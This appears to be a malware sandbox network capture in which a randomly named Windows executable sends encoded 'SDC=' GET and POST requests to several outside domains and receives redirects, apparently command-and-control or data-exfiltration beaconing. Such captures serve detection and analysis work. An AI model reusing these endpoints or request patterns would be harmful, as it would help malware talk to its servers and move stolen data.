Jan 10, 2025 18:15:28.098017931 CET	73	IN	HTTP/1.1 405 Method Not Allowed content-length: 0 connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.10	50004	13.248.169.48	80	2404	C:\Program Files (x86)\TOwdrVmwSMtIzbKoEPfEqDHyqbUsqXMMWSPJpBvzXOXYrZXbwwgrghrHBivqWprCGWDHesrYs\krQctklhjIp.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 18:15:30.167126894 CET	484	OUT	GET /yvuf/?SDC=kadexEirh/+VAO8zLOQBjj7ri78LMX6rnGwiRgKyb2lIFzAlJiRuP0wbsEUUXC8rnmyzmDulN6bnJ3eZuWUqQAzy8gMCuzUMeqhoyPM0gWyFgi2HaQ==&mH=CpePy0P HTTP/1.1 Host: www.londonatnight.coffee Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.9 Connection: close User-Agent: Mozilla/5.0 (Linux; U; Android 4.4; en-us; Nexus 4 Build/JOP24G) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
Jan 10, 2025 18:15:30.618510962 CET	367	IN	HTTP/1.1 200 OK content-type: text/html date: Fri, 10 Jan 2025 17:15:30 GMT content-length: 246 connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 53 44 43 3d 6b 61 64 65 78 45 69 72 68 2f 2b 56 41 4f 38 7a 4c 4f 51 42 6a 6a 37 72 69 37 38 4c 4d 58 36 72 6e 47 77 69 52 67 4b 79 62 32 6c 49 46 7a 41 6c 4a 69 52 75 50 30 77 62 73 45 55 55 58 43 38 72 6e 6d 79 7a 6d 44 75 6c 4e 36 62 6e 4a 33 65 5a 75 57 55 71 51 41 7a 79 38 67 4d 43 75 7a 55 4d 65 71 68 6f 79 50 4d 30 67 57 79 46 67 69 32 48 61 51 3d 3d 26 6d 48 3d 43 70 65 50 79 30 50 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?SDC=kadexEirh/+VAO8zLOQBjj7ri78LMX6rnGwiRgKyb2lIFzAlJiRuP0wbsEUUXC8rnmyzmDulN6bnJ3eZuWUqQAzy8gMCuzUMeqhoyPM0gWyFgi2HaQ==&mH=CpePy0P"}</script></head></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.10	50005	136.243.64.147	80	2404	C:\Program Files (x86)\TOwdrVmwSMtIzbKoEPfEqDHyqbUsqXMMWSPJpBvzXOXYrZXbwwgrghrHBivqWprCGWDHesrYs\krQctklhjIp.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 18:15:36.229028940 CET	768	OUT	POST /e9xq/ HTTP/1.1 Host: www.100millionjobs.africa Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Origin: http://www.100millionjobs.africa Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Content-Length: 192 Connection: close Referer: http://www.100millionjobs.africa/e9xq/ User-Agent: Mozilla/5.0 (Linux; U; Android 4.4; en-us; Nexus 4 Build/JOP24G) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30 Data Raw: 53 44 43 3d 69 4a 39 56 4b 4f 47 58 53 62 57 4f 58 68 74 68 68 53 4a 41 44 4a 30 68 48 61 71 70 68 53 74 69 45 4d 75 4d 62 53 31 64 61 52 55 4e 47 41 70 32 31 70 44 35 6f 53 56 2b 70 59 35 4a 46 7a 30 4b 5a 48 77 30 47 4c 64 56 59 59 32 36 6e 71 52 48 75 33 73 47 47 6c 6d 77 49 6c 44 49 62 4b 48 71 6a 34 54 62 39 45 4f 34 4d 41 58 51 34 33 2f 73 59 42 67 44 78 53 44 58 31 44 42 31 30 52 47 53 79 44 63 46 77 71 64 4b 52 56 61 42 30 75 53 6c 6e 53 61 68 6d 41 67 42 6a 31 59 6d 4f 5a 46 72 74 50 32 6d 6a 39 54 4e 38 6c 7a 52 59 56 69 2f 76 57 77 73 79 36 49 78 4f 4a 30 42 Data Ascii: SDC=iJ9VKOGXSbWOXhthhSJADJ0hHaqphStiEMuMbS1daRUNGAp21pD5oSV+pY5JFz0KZHw0GLdVYY26nqRHu3sGGlmwIlDIbKHqj4Tb9EO4MAXQ43/sYBgDxSDX1DB10RGSyDcFwqdKRVaB0uSlnSahmAgBj1YmOZFrtP2mj9TN8lzRYVi/vWwsy6IxOJ0B
Jan 10, 2025 18:15:36.868447065 CET	493	IN	HTTP/1.1 302 Found Date: Fri, 10 Jan 2025 17:15:36 GMT Server: Apache Location: http://maximumgroup.co.za/e9xq/ Content-Length: 290 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 6d 61 78 69 6d 75 6d 67 72 6f 75 70 2e 63 6f 2e 7a 61 2f 65 39 78 71 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 31 30 30 6d 69 6c 6c 69 6f 6e 6a 6f 62 73 2e 61 66 72 69 63 61 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="http://maximumgroup.co.za/e9xq/">here</a>.</p><hr><address>Apache Server at www.100millionjobs.africa Port 80</address></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.10	50006	136.243.64.147	80	2404	C:\Program Files (x86)\TOwdrVmwSMtIzbKoEPfEqDHyqbUsqXMMWSPJpBvzXOXYrZXbwwgrghrHBivqWprCGWDHesrYs\krQctklhjIp.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 18:15:38.783001900 CET	792	OUT	POST /e9xq/ HTTP/1.1 Host: www.100millionjobs.africa Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Origin: http://www.100millionjobs.africa Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Content-Length: 216 Connection: close Referer: http://www.100millionjobs.africa/e9xq/ User-Agent: Mozilla/5.0 (Linux; U; Android 4.4; en-us; Nexus 4 Build/JOP24G) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30 Data Raw: 53 44 43 3d 69 4a 39 56 4b 4f 47 58 53 62 57 4f 59 69 46 68 6b 7a 4a 41 58 5a 30 69 4e 36 71 70 71 79 74 6d 45 4d 69 4d 62 54 78 72 62 6b 4d 4e 47 6c 56 32 30 74 58 35 6b 79 56 2b 6a 34 35 4d 4c 54 30 37 5a 48 74 42 47 4f 39 56 59 59 69 36 6e 76 74 48 74 41 41 42 47 31 6d 79 52 56 44 77 56 71 48 71 6a 34 54 62 39 45 62 6a 4d 41 50 51 2f 48 50 73 65 67 67 4d 38 79 44 57 6a 54 42 31 77 52 47 57 79 44 64 53 77 76 68 77 52 57 69 42 30 76 69 6c 67 44 61 69 6f 41 67 44 74 56 5a 61 4a 38 38 4f 6a 4f 6d 47 73 2f 4f 46 68 6a 6a 6e 66 30 66 34 2b 48 52 37 68 4e 55 2f 41 50 42 72 55 64 39 37 35 41 65 49 6c 55 61 76 66 76 67 69 38 59 36 6b 64 41 3d 3d Data Ascii: SDC=iJ9VKOGXSbWOYiFhkzJAXZ0iN6qpqytmEMiMbTxrbkMNGlV20tX5kyV+j45MLT07ZHtBGO9VYYi6nvtHtAABG1myRVDwVqHqj4Tb9EbjMAPQ/HPseggM8yDWjTB1wRGWyDdSwvhwRWiB0vilgDaioAgDtVZaJ88OjOmGs/OFhjjnf0f4+HR7hNU/APBrUd975AeIlUavfvgi8Y6kdA==
Jan 10, 2025 18:15:39.407567978 CET	493	IN	HTTP/1.1 302 Found Date: Fri, 10 Jan 2025 17:15:39 GMT Server: Apache Location: http://maximumgroup.co.za/e9xq/ Content-Length: 290 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 6d 61 78 69 6d 75 6d 67 72 6f 75 70 2e 63 6f 2e 7a 61 2f 65 39 78 71 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 31 30 30 6d 69 6c 6c 69 6f 6e 6a 6f 62 73 2e 61 66 72 69 63 61 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="http://maximumgroup.co.za/e9xq/">here</a>.</p><hr><address>Apache Server at www.100millionjobs.africa Port 80</address></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.10	50007	136.243.64.147	80	2404	C:\Program Files (x86)\TOwdrVmwSMtIzbKoEPfEqDHyqbUsqXMMWSPJpBvzXOXYrZXbwwgrghrHBivqWprCGWDHesrYs\krQctklhjIp.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 18:15:41.328844070 CET	1805	OUT	POST /e9xq/ HTTP/1.1 Host: www.100millionjobs.africa Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Origin: http://www.100millionjobs.africa Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Content-Length: 1228 Connection: close Referer: http://www.100millionjobs.africa/e9xq/ User-Agent: Mozilla/5.0 (Linux; U; Android 4.4; en-us; Nexus 4 Build/JOP24G) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30 Data Raw: 53 44 43 3d 69 4a 39 56 4b 4f 47 58 53 62 57 4f 59 69 46 68 6b 7a 4a 41 58 5a 30 69 4e 36 71 70 71 79 74 6d 45 4d 69 4d 62 54 78 72 62 6e 73 4e 46 58 74 32 31 4b 37 35 6e 79 56 2b 39 6f 35 4e 4c 54 30 6d 5a 48 31 4e 47 4f 67 33 59 61 61 36 32 39 56 48 6f 79 34 42 4e 31 6d 79 4d 6c 44 4c 62 4b 48 7a 6a 34 43 63 39 45 4c 6a 4d 41 50 51 2f 46 48 73 64 78 67 4d 76 69 44 58 31 44 42 35 30 52 47 75 79 44 46 43 77 75 77 53 53 6e 43 42 30 50 79 6c 69 31 32 69 33 51 67 4e 34 56 5a 43 4a 38 34 64 6a 4b 47 4b 73 2b 37 69 68 6b 58 6e 64 69 57 50 71 7a 4a 69 2b 2f 56 2b 43 2f 39 6f 65 70 52 4c 33 53 54 50 6c 78 79 56 63 50 30 7a 2b 4a 44 66 64 4c 47 6e 61 58 75 30 2f 7a 74 36 50 4e 6f 59 54 31 37 58 42 53 4e 74 6b 56 62 68 59 7a 51 6d 32 35 37 62 65 2f 63 79 44 7a 4a 72 34 73 6f 30 73 71 62 4f 34 39 72 47 41 32 7a 73 44 31 6e 2b 4e 51 47 76 6d 59 6f 46 55 2b 56 6c 4d 74 6c 61 30 64 65 62 69 32 70 58 4b 37 70 47 68 4f 48 51 6a 41 78 6f 47 66 38 31 50 6f 67 36 6c 38 52 49 4b 2b 67 2b 51 45 66 30 34 67 2f 57 33 57 [TRUNCATED] Data Ascii: SDC=iJ9VKOGXSbWOYiFhkzJAXZ0iN6qpqytmEMiMbTxrbnsNFXt21K75nyV+9o5NLT0mZH1NGOg3Yaa629VHoy4BN1myMlDLbKHzj4Cc9ELjMAPQ/FHsdxgMviDX1DB50RGuyDFCwuwSSnCB0Pyli12i3QgN4VZCJ84djKGKs+7ihkXndiWPqzJi+/V+C/9oepRL3STPlxyVcP0z+JDfdLGnaXu0/zt6PNoYT17XBSNtkVbhYzQm257be/cyDzJr4so0sqbO49rGA2zsD1n+NQGvmYoFU+VlMtla0debi2pXK7pGhOHQjAxoGf81Pog6l8RIK+g+QEf04g/W3WQkHI3zo9+Arg+PiWKWNKo0g139bzKaWSW5R7R/7n4QQS5E1yBriwW1Er9DLhUIY4SmS5qBzft+2OMJihDXeK8kdzfiBzWxPuxfKZj27O/+00IwUCd0tcNevj0Qt5FXCsm+uT7kSsd2CJPY30V2kB0zMCKiz00c+xyoE2mHHPFoSrn2szuzgo47S/oLtoEaaSTa3fsPbVf0khWBXSal88Qa9pJyEfqNEEgPZpY817ixzLc0BT24ASSdGon2ZNXf/sxX1hGelI2vWnSePU9BkukcT3IxBV/Be0TFfBd9C+EWltzWqP/1T0W9am9uweCPV85U/GQRVz0jVoqgy/NtqNo5Wach7dbkRrHr5wycWZ77u4UX53AhuO7COO64HbLIf4DCHQbj6LVs8IR/yrK2jDJ4ioCZ6ltpwPyIvcVfRDUNYhwBmGPBoKwW6/I6jcfZaijiqiiaFJbhnyZud7vYpYX9zWTbiolaJz/ZxjUlMX27QgHaTXLjvmmMaKg/fcvHlH3MXlpSlFVChtkFTey9gd5K6/UtzyC+C6JhzBBHgdL52CJQUuU1wQ7xNuQnpDDxPY60WkznrMhpgG2sfAZysjZRjyZ/SFVDFcU/a8hEmljwwqhXob41Xf4v43o9Qs93RuYumAc8OHagaGg5zu/VmfxYGWVyu6htFPfv [TRUNCATED]
Jan 10, 2025 18:15:41.949074984 CET	493	IN	HTTP/1.1 302 Found Date: Fri, 10 Jan 2025 17:15:41 GMT Server: Apache Location: http://maximumgroup.co.za/e9xq/ Content-Length: 290 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 6d 61 78 69 6d 75 6d 67 72 6f 75 70 2e 63 6f 2e 7a 61 2f 65 39 78 71 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 31 30 30 6d 69 6c 6c 69 6f 6e 6a 6f 62 73 2e 61 66 72 69 63 61 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="http://maximumgroup.co.za/e9xq/">here</a>.</p><hr><address>Apache Server at www.100millionjobs.africa Port 80</address></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.10	50008	136.243.64.147	80	2404	C:\Program Files (x86)\TOwdrVmwSMtIzbKoEPfEqDHyqbUsqXMMWSPJpBvzXOXYrZXbwwgrghrHBivqWprCGWDHesrYs\krQctklhjIp.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 18:15:43.872653008 CET	485	OUT	GET /e9xq/?SDC=vLV1J+/JL7emdgprty1ncu0KHpmetCJuDvKoQC5RQhNLFhlxyYzYnQ1Du/ZINDU4MCAfCc1yb6Xx/9xVnSgqC2qCM0uYfLju69H/oCPnCR3O6w33Mg==&mH=CpePy0P HTTP/1.1 Host: www.100millionjobs.africa Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.9 Connection: close User-Agent: Mozilla/5.0 (Linux; U; Android 4.4; en-us; Nexus 4 Build/JOP24G) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
Jan 10, 2025 18:15:44.508090973 CET	761	IN	HTTP/1.1 302 Found Date: Fri, 10 Jan 2025 17:15:44 GMT Server: Apache Location: http://maximumgroup.co.za/e9xq/?SDC=vLV1J+/JL7emdgprty1ncu0KHpmetCJuDvKoQC5RQhNLFhlxyYzYnQ1Du/ZINDU4MCAfCc1yb6Xx/9xVnSgqC2qCM0uYfLju69H/oCPnCR3O6w33Mg==&mH=CpePy0P Content-Length: 426 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 6d 61 78 69 6d 75 6d 67 72 6f 75 70 2e 63 6f 2e 7a 61 2f 65 39 78 71 2f 3f 53 44 43 3d 76 4c 56 31 4a 2b 2f 4a 4c 37 65 6d 64 67 70 72 74 79 31 6e 63 75 30 4b 48 70 6d 65 74 43 4a 75 44 76 4b 6f 51 43 35 52 51 68 4e 4c 46 68 6c 78 79 59 7a 59 6e 51 31 44 75 2f 5a 49 4e 44 55 34 4d 43 41 66 43 63 31 79 62 36 58 78 2f 39 78 56 6e 53 67 71 43 32 71 43 4d 30 75 59 66 4c 6a 75 36 39 48 2f 6f 43 50 6e 43 52 33 4f 36 77 33 33 4d 67 3d 3d 26 61 6d 70 3b 6d 48 3d 43 70 65 50 79 30 50 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 68 [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="http://maximumgroup.co.za/e9xq/?SDC=vLV1J+/JL7emdgprty1ncu0KHpmetCJuDvKoQC5RQhNLFhlxyYzYnQ1Du/ZINDU4MCAfCc1yb6Xx/9xVnSgqC2qCM0uYfLju69H/oCPnCR3O6w33Mg==&mH=CpePy0P">here</a>.</p><hr><address>Apache Server at www.100millionjobs.africa Port 80</address></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.10	50009	85.159.66.93	80	2404	C:\Program Files (x86)\TOwdrVmwSMtIzbKoEPfEqDHyqbUsqXMMWSPJpBvzXOXYrZXbwwgrghrHBivqWprCGWDHesrYs\krQctklhjIp.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 18:15:49.672657967 CET	759	OUT	POST /kbfm/ HTTP/1.1 Host: www.letsbookcruise.xyz Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Origin: http://www.letsbookcruise.xyz Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Content-Length: 192 Connection: close Referer: http://www.letsbookcruise.xyz/kbfm/ User-Agent: Mozilla/5.0 (Linux; U; Android 4.4; en-us; Nexus 4 Build/JOP24G) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30 Data Raw: 53 44 43 3d 4a 76 66 45 37 74 6c 70 4c 6e 44 66 41 74 59 53 78 56 6d 77 33 73 34 77 67 45 53 34 6c 73 66 77 33 66 4a 4a 56 73 78 6b 69 63 38 75 46 71 50 31 53 37 74 74 6c 6b 71 6b 70 63 4e 79 50 46 4f 4c 48 33 2f 2f 31 63 6d 4a 63 50 6d 41 53 76 57 79 38 35 68 52 39 31 73 78 68 50 6f 72 59 6f 53 53 37 69 33 31 48 2b 32 66 5a 61 49 42 52 4f 74 6d 48 7a 36 65 6b 50 71 6b 4d 4a 61 32 33 70 4d 59 77 41 42 53 75 69 4b 36 44 7a 78 2f 5a 66 33 44 4d 75 59 31 62 4e 50 34 71 5a 77 78 39 33 6c 4a 70 37 47 49 30 6c 6e 65 49 31 48 6f 52 69 4a 6e 79 64 78 6a 53 65 35 54 32 2f 4a 63 Data Ascii: SDC=JvfE7tlpLnDfAtYSxVmw3s4wgES4lsfw3fJJVsxkic8uFqP1S7ttlkqkpcNyPFOLH3//1cmJcPmASvWy85hR91sxhPorYoSS7i31H+2fZaIBROtmHz6ekPqkMJa23pMYwABSuiK6Dzx/Zf3DMuY1bNP4qZwx93lJp7GI0lneI1HoRiJnydxjSe5T2/Jc

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.10	50010	85.159.66.93	80	2404	C:\Program Files (x86)\TOwdrVmwSMtIzbKoEPfEqDHyqbUsqXMMWSPJpBvzXOXYrZXbwwgrghrHBivqWprCGWDHesrYs\krQctklhjIp.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 18:15:52.224605083 CET	783	OUT	POST /kbfm/ HTTP/1.1 Host: www.letsbookcruise.xyz Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Origin: http://www.letsbookcruise.xyz Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Content-Length: 216 Connection: close Referer: http://www.letsbookcruise.xyz/kbfm/ User-Agent: Mozilla/5.0 (Linux; U; Android 4.4; en-us; Nexus 4 Build/JOP24G) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30 Data Raw: 53 44 43 3d 4a 76 66 45 37 74 6c 70 4c 6e 44 66 44 4e 49 53 79 79 79 77 38 73 34 76 76 6b 53 34 76 4d 66 38 33 66 46 4a 56 70 4a 30 69 76 49 75 63 4a 62 31 41 71 74 74 6b 6b 71 6b 78 4d 4e 33 4c 46 4f 51 48 33 7a 64 31 63 71 4a 63 4c 47 41 53 72 53 79 39 4f 4e 53 2f 6c 73 33 6f 76 6f 74 57 49 53 53 37 69 33 31 48 2b 69 35 5a 61 51 42 52 2f 39 6d 45 52 53 64 6c 50 71 6a 63 5a 61 32 6d 35 4d 63 77 41 42 77 75 6e 54 64 44 77 5a 2f 5a 61 54 44 50 37 34 32 52 4e 50 2b 33 4a 78 44 73 32 59 65 7a 2f 43 67 79 30 37 33 53 6c 61 50 53 44 30 67 6a 4d 51 30 42 70 6c 64 34 35 38 32 42 39 77 79 37 7a 63 4e 35 64 46 57 65 59 68 67 37 76 48 69 74 67 3d 3d Data Ascii: SDC=JvfE7tlpLnDfDNISyyyw8s4vvkS4vMf83fFJVpJ0ivIucJb1AqttkkqkxMN3LFOQH3zd1cqJcLGASrSy9ONS/ls3ovotWISS7i31H+i5ZaQBR/9mERSdlPqjcZa2m5McwABwunTdDwZ/ZaTDP742RNP+3JxDs2Yez/Cgy073SlaPSD0gjMQ0Bpld4582B9wy7zcN5dFWeYhg7vHitg==

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.10	50011	85.159.66.93	80	2404	C:\Program Files (x86)\TOwdrVmwSMtIzbKoEPfEqDHyqbUsqXMMWSPJpBvzXOXYrZXbwwgrghrHBivqWprCGWDHesrYs\krQctklhjIp.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 18:15:54.768033028 CET	1796	OUT	POST /kbfm/ HTTP/1.1 Host: www.letsbookcruise.xyz Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Origin: http://www.letsbookcruise.xyz Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Content-Length: 1228 Connection: close Referer: http://www.letsbookcruise.xyz/kbfm/ User-Agent: Mozilla/5.0 (Linux; U; Android 4.4; en-us; Nexus 4 Build/JOP24G) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30 Data Raw: 53 44 43 3d 4a 76 66 45 37 74 6c 70 4c 6e 44 66 44 4e 49 53 79 79 79 77 38 73 34 76 76 6b 53 34 76 4d 66 38 33 66 46 4a 56 70 4a 30 69 75 77 75 63 5a 48 31 53 64 5a 74 31 55 71 6b 39 73 4e 32 4c 46 4f 52 48 33 37 5a 31 64 58 72 63 4e 4b 41 51 49 4b 79 6f 4b 5a 53 6c 31 73 33 6c 50 6f 6f 59 6f 54 51 37 69 6e 35 48 2b 79 35 5a 61 51 42 52 38 31 6d 54 54 36 64 6f 76 71 6b 4d 4a 61 71 33 70 4d 77 77 41 49 4e 75 6d 6e 6e 44 42 35 2f 5a 38 7a 44 44 6f 51 32 64 4e 50 38 32 4a 78 62 73 32 56 5a 7a 2b 71 73 79 30 66 52 53 6e 4b 50 42 31 31 73 33 50 52 75 64 66 6c 49 6e 34 4d 32 4a 72 67 46 39 51 56 7a 32 65 64 49 4e 4b 49 4b 37 66 4b 55 76 6d 35 64 79 79 4f 56 56 4e 79 7a 43 48 73 67 78 2b 7a 63 68 41 49 57 71 6a 6f 42 41 41 69 50 51 55 32 38 37 4d 6a 64 35 39 32 41 6a 74 6d 61 49 69 65 31 2f 50 2f 6b 49 4d 34 71 6b 2b 54 51 44 76 46 6f 62 6b 2f 41 61 52 38 31 56 49 73 67 49 55 44 50 52 4e 56 50 49 63 58 66 43 34 4f 33 52 79 70 6b 6d 66 64 6f 51 76 67 73 78 5a 42 30 54 30 4d 77 4a 69 51 38 7a 4e 49 32 58 55 [TRUNCATED] Data Ascii: 